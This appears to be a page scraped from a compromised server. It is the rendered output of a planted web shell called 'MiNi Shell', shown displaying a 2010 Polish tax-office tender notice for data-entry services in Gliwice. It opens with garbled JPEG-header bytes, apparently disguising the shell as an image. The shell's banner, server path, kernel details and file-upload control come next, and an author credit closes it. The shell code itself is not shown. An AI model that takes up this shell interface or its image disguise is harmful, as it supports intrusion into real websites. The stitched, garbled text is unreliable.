JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100618/173166-N-2010.html

<p class="kh_header"><b>Gliwice: świadczenie usług w zakresie wprowadzania do komputerowej bazy EGAPOLTAX danych z tytułów wykonawczych, elektronicznej migracji tytułów wykonawczych, opieczętowywania tytułów wykonawczych, rozdzielania tytułów wykonawczych na rejony egzekucyjne
 oraz wykonywania dodatkowych czynności biurowych związanych z obsługą tytułów wykonawczych</b><br>
<b>Numer ogłoszenia: 173166 - 2010; data zamieszczenia: 18.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pierwszy Urząd Skarbowy w Gliwicach , ul. Góry Chełmskiej 15, 44-100 Gliwice, woj. śląskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.isnet.katowice.pl/US/gliwice1.htm</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług w zakresie wprowadzania do komputerowej bazy EGAPOLTAX danych z tytułów wykonawczych, elektronicznej migracji tytułów wykonawczych, opieczętowywania tytułów wykonawczych, rozdzielania tytułów wykonawczych na rejony egzekucyjne
 oraz wykonywania dodatkowych czynności biurowych związanych z obsługą tytułów wykonawczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług polegających  na:
a)	wprowadzaniu do komputerowej bazy EGAPOLTAX danych z tytułów wykonawczych, opieczętowywanie tytułów wykonawczych, rozdzielanie tytułów wykonawczych na rejony egzekucyjne 
b)	 wykonywaniu dodatkowych czynności biurowych związanych z obsługą tytułów wykonawczych (w tym między innymi: elektroniczna migracja tytułów wykonawczych wraz z opieczętowaniem i rozdziałem na rejony, kserowanie akt egzekucyjnych, układanie w kolejności numerycznej ewidencji tytułów wykonawczych oraz wysyłka kopii ewidencji dla wierzycieli, nanoszenie numerów rejonów egzekucyjnych na wydruki tytułów wykonawczych, podział zwrotek wpływających do Działu Egzekucyjnego oraz pism na rejony egzekucyjne, sprawdzanie informacji o miejscu pracy lub świadczeniu emerytalnym zobowiązanego, segregowanie pism do zapoznania, archiwizacja akt egzekucyjnych, przygotowywanie zapytań w trybie art. 36 ustawy o postępowaniu egzekucyjnym w administracji). 

Przewidywana maksymalna ilość sztuk tytułów wykonawczych oraz ilość roboczogodzin 
w trakcie realizacji przedmiotowego zamówienia nie przekroczy  odpowiednio:
a)	15.000 sztuk tytułów wykonawczych 
b)	  5.040 roboczogodzin   
i faktycznie uzależniona będzie od ilości wpływających do Zamawiającego tytułów wykonawczych oraz konieczności wykonywania czynności biurowych związanych z ich obsługą.
W przypadku złożenia oferty przez firmę, przedmiot zamówienia jest objęty stawką 22% podatku VAT wynikającą z kwalifikacji grupowania statystycznego PKWiU.

W przypadku złożenia oferty przez osobę fizyczną zamawiający potrąci i odprowadzi do ZUS obowiązkowe składki na ubezpieczenia emerytalne, rentowe, wypadkowe i chorobowe zgodnie z ustawą o systemie ubezpieczeń społecznych z  dnia 13 października 1998r. (tj. Dz.U. z 2007r. Nr 11, poz. 74 z późn.  zm.) oraz ubezpieczenie zdrowotne zgodnie z ustawą z dnia 27.08.2004r. oświadczeniach opieki zdrowotnej finansowanych ze środków publicznych (Dz.U. nr 210, poz. 2135 z późn. zm.) 

Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie wykonawcy w wysokości nie większej niż 0,65 zł. brutto za jedną sztukę  wprowadzonego do bazy  komputerowej tytułu wykonawczego i  8,5 zł. brutto za jedną roboczogodzinę.

Zamawiający zastrzega, iż w trakcie trwania umowy, w razie zaistnienia przesłanek, niezależnych od Zamawiającego, których nie można było przewidzieć w chwili zawarcia umowy, a mających wpływ na ilości realizowanych usług będących przedmiotem niniejszej umowy (tj. na wskazaną w punkcie 4 umowy ilość tytułów wykonawczych i ilość roboczogodzin), zostaną dokonane przesunięcia, o ile będzie wymagała tego sytuacja, dotyczące wskazanych ilości (tj. zmniejszenia/lub zwiększenia ilości tytułów wykonawczych i odpowiednio zwiększenia/lub zmniejszenia ilości godzin do przepracowania), w taki sposób, że wprowadzone zmiany nie przekroczą ceny brutto wskazanej w umowie.
Do wskazanych wyżej przesłanek, Zamawiający zaliczy okoliczności związane z wdrożonym projektem elektronicznego pozyskiwania tytułów wykonawczych przez urzędy skarbowe w następujących sytuacjach: 
a)	w przypadku, gdy którykolwiek wierzyciel, który obecnie przesyła Zamawiającemu tytuły za pomocą ewidencji elektronicznej, zrezygnuje z tej formy przesyłania tytułów wykonawczych i wróci do wystawiania tytułów w sposób tradycyjny (wymagający ręcznego wprowadzenia tytułu do bazy), a tytuły te będą wpływały do Zamawiającego, 
b)	w przypadku, gdy którykolwiek wierzyciel, który obecnie przesyła Zamawiającemu tytuły 
w sposób tradycyjny (wymagający ręcznego wprowadzenia tytułu do bazy), wdroży przesyłanie tytułów w formie elektronicznej i w takiej formie będzie je otrzymywał Zamawiający. 
W trakcie trwania umowy, Wykonawca będący osobą fizyczną prowadzącą działalność gospodarczą może zmienić osobę przewidzianą do realizacji przedmiotowych usług, z tym, że  zmiana ta nie może być dokonywana częściej niż raz w roku kalendarzowym. Dodatkowo Zamawiający zastrzega, iż w przypadku zmiany osoby przewidzianej  do realizacji zamówienia, osoba ta musi spełniać warunki określone w Specyfikacji Istotnych Warunków Zamówienia, 
tj. musi mieć ukończone 18 lat, musi zaliczyć test praktyczny w siedzibie Zamawiającego (potwierdzający praktyczną znajomość obsługi komputera ) i uzyskać akceptację Zamawiającego

Wymagania związane z przedmiotem zamówienia i sposób jego realizacji znajdują się w Ogólnych warunkach umowy stanowiących załącznik nr 5 do  SIWZ.
Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:
a)	wymagana jest należyta staranność przy realizacji  zobowiązań umowy, 
b)	wymagana jest bardzo dobra znajomość obsługi komputera, a szczególnie szybkiego pisania na klawiaturze, 
c)	zachowania w tajemnicy uzyskanych informacji zarówno w czasie trwania umowy, jak i po jej ustaniu,
d)	ścisłego przestrzegania przepisów przeciwpożarowych obowiązujących na terenie Pierwszego Urzędu Skarbowego w Gliwicach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>w przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy usług zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe zostało udzielone w trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniające było przewidziane w ogłoszeniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca będący osobą fizyczną nie prowadzącą działalności gospodarczej w dniu składania ofert musi mieć ukończony 18 rok życia, powyższy warunek muszą także spełniać osoby zatrudnione przez wykonawcę prowadzącego działalność wykonawczą. 
Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału na podstawie oświadczenia Wykonawcy o spełnieniu warunku dot. posiadania uprawnień do wykonywania określonej działalności (czynności) określonej w przedmiocie zamówienia (załącznik nr 3 do SIWZ) 

Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie złożonych dokumentów lub oświadczeń wg formuły spełnia/nie spełnia.  Wykonawcy nie spełniający warunków udziału w postępowaniu zostaną przez Zamawiającego wykluczeni z postępowania, a ich oferty zostaną odrzucone. Brak jakiegokolwiek dokumentu wymienionego w punkcie 21 SIWZ lub złożenie w niewłaściwej formie spowoduje wykluczenie Wykonawcy  z ubiegania się o udzielenie zamówienia publicznego ( z zastrzeżeniem art.26 ust.3 uPzp.)
Opis sposobu przygotowania oferty zawarty zostały w punkcie 23 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału na podstawie oświadczenia Wykonawcy o spełnieniu warunku dot. posiadania wiedzy i doświadczenia zapewniającej wykonanie zamówienia (załącznik nr 3 do SIWZ) 
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie złożonych dokumentów lub oświadczeń wg formuły spełnia/nie spełnia.  Wykonawcy nie spełniający warunków udziału w postępowaniu zostaną przez Zamawiającego wykluczeni z postępowania, a ich oferty zostaną odrzucone. Brak jakiegokolwiek dokumentu wymienionego w punkcie 21 SIWZ lub złożenie w niewłaściwej formie spowoduje wykluczenie Wykonawcy  z ubiegania się o udzielenie zamówienia publicznego (z zastrzeżeniem art.26 ust.3 uPzp.). 
Opis sposobu przygotowania oferty zawarty zostały w punkcie 23 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału na podstawie oświadczenia Wykonawcy o spełnieniu warunku dot. dysponowania odpowiednim potencjałem technicznym (załącznik nr 3 do SIWZ).
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie złożonych dokumentów lub oświadczeń wg formuły spełnia/nie spełnia.  Wykonawcy nie spełniający warunków udziału w postępowaniu zostaną przez Zamawiającego wykluczeni z postępowania, a ich oferty zostaną odrzucone. Brak jakiegokolwiek dokumentu wymienionego w punkcie 21 SIWZ lub złożenie w niewłaściwej formie spowoduje wykluczenie Wykonawcy  z ubiegania się o udzielenie zamówienia publicznego ( z zastrzeżeniem art.26 ust.3 uPzp). 
Opis sposobu przygotowania oferty zawarty zostały w punkcie 23 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału na podstawie oświadczenia Wykonawcy o spełnieniu warunku dot. dysponowania osobami zdolnymi do wykonania zamówienia (załącznik nr 3 do SIWZ).
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie złożonych dokumentów lub oświadczeń wg formuły spełnia/nie spełnia.  Wykonawcy nie spełniający warunków udziału w postępowaniu zostaną przez Zamawiającego wykluczeni z postępowania, a ich oferty zostaną odrzucone. Brak jakiegokolwiek dokumentu wymienionego w punkcie 21 SIWZ lub złożenie w niewłaściwej formie spowoduje wykluczenie Wykonawcy  z ubiegania się o udzielenie zamówienia publicznego ( z zastrzeżeniem art.26 ust.3 uPzp.). 
Opis sposobu przygotowania oferty zawarty zostały w punkcie 23 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału na podstawie oświadczenia o spełnieniu warunku dot. sytuacji ekonomicznej i finansowej (załącznik nr 3 do SIWZ).
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie złożonych dokumentów lub oświadczeń wg formuły spełnia/nie spełnia.  Wykonawcy nie spełniający warunków udziału w postępowaniu zostaną przez Zamawiającego wykluczeni z postępowania, a ich oferty zostaną odrzucone. Brak jakiegokolwiek dokumentu wymienionego w punkcie 21 SIWZ lub złożenie w niewłaściwej formie spowoduje wykluczenie Wykonawcy  z ubiegania się o udzielenie zamówienia publicznego ( z zastrzeżeniem art.26 ust.3 uPzp.). 
Opis sposobu przygotowania oferty zawarty zostały w punkcie 23 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz oferty - zał.nr 1 do SIWZ, pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik,
Wykonawca może do oferty dołączyć listy referencyjne potwierdzające wykonywanie usług porównywalnych z przedmiotem zamówienia oraz zaświadczenie o ukończeniu kursu komputerowego.
Listy referencyjne i zaświadczenia  nie są dokumentami potwierdzającymi spełnienie warunków udziału w postępowaniu. Złożenie tych dokumentów w ofercie nie jest obligatoryjne.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - doświadczenie zawodowe i przygotowanie fachowe - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega, iż w trakcie trwania umowy, w razie zaistnienia przesłanek, niezależnych od Zamawiającego, których nie można było przewidzieć w chwili zawarcia umowy, a mających wpływ na ilości realizowanych usług będących przedmiotem niniejszej umowy (tj. na wskazaną w punkcie 4 umowy ilość tytułów wykonawczych i ilość roboczogodzin), zostaną dokonane przesunięcia, o ile będzie wymagała tego sytuacja, dotyczące wskazanych ilości (tj. zmniejszenia/lub zwiększenia ilości tytułów wykonawczych i odpowiednio zwiększenia/lub zmniejszenia ilości godzin do przepracowania), w taki sposób, że wprowadzone zmiany nie przekroczą ceny brutto wskazanej w umowie.
Do wskazanych wyżej przesłanek, Zamawiający zaliczy okoliczności związane z wdrożonym projektem elektronicznego pozyskiwania tytułów wykonawczych przez urzędy skarbowe 
w następujących sytuacjach: 
a)	w przypadku, gdy którykolwiek wierzyciel, który obecnie przesyła Zamawiającemu tytuły za pomocą ewidencji elektronicznej, zrezygnuje z tej formy przesyłania tytułów wykonawczych i wróci do wystawiania tytułów w sposób tradycyjny (wymagający ręcznego wprowadzenia tytułu do bazy), a tytuły te będą wpływały do Zamawiającego, 
b)	w przypadku, gdy którykolwiek wierzyciel, który obecnie przesyła Zamawiającemu tytuły 
w sposób tradycyjny (wymagający ręcznego wprowadzenia tytułu do bazy), wdroży przesyłanie tytułów w formie elektronicznej i w takiej formie będzie je otrzymywał Zamawiający.
W trakcie trwania umowy, Wykonawca będący osobą fizyczną prowadzącą działalność gospodarczą może zmienić osobę przewidzianą do realizacji przedmiotowych usług, z tym, że  zmiana ta nie może być dokonywana częściej niż raz w roku kalendarzowym. Dodatkowo Zamawiający zastrzega, iż w przypadku zmiany osoby przewidzianej  do realizacji zamówienia, osoba ta musi spełniać warunki określone w Specyfikacji Istotnych Warunków Zamówienia, 
tj. musi mieć ukończone 18 lat, musi zaliczyć test praktyczny w siedzibie Zamawiającego (potwierdzający praktyczną znajomość obsługi komputera ) i uzyskać akceptację Zamawiającego.

Ceny jednostkowe usług wskazane w punkcie 1 a i 1 b umowy będą obowiązywać do końca 2010r. tj. do dnia 31 grudnia 2010r. 
W kolejnych latach trwania umowy przewiduje się możliwość ich waloryzacji jeden raz w roku w oparciu o średnioroczny wskaźnik wzrostu cen towarów i usług konsumpcyjnych podawanych przez Prezesa GUS, każdorazowo po zakończeniu roku kalendarzowego, na pisemny wniosek wykonawcy złożony Zamawiającemu. Podwyższona wartość cen jednostkowych obowiązywać będzie od miesiąca kalendarzowego, w którym został złożony wniosek Wykonawcy- powyższe zostanie wprowadzone w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.isnet.katowice.pl/US/gliwice1.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pierwszy Urząd Skarbowy w Gliwicach ul. Góry Chełmskiej 15, I piętro, pokój  nr 110.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2010 godzina 09:00, miejsce: siedziba Pierwszego Urzędu Skarbowego w Gliwicach przy ul. Góry Chełmskiej 15, 
I piętro pokój nr 110.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com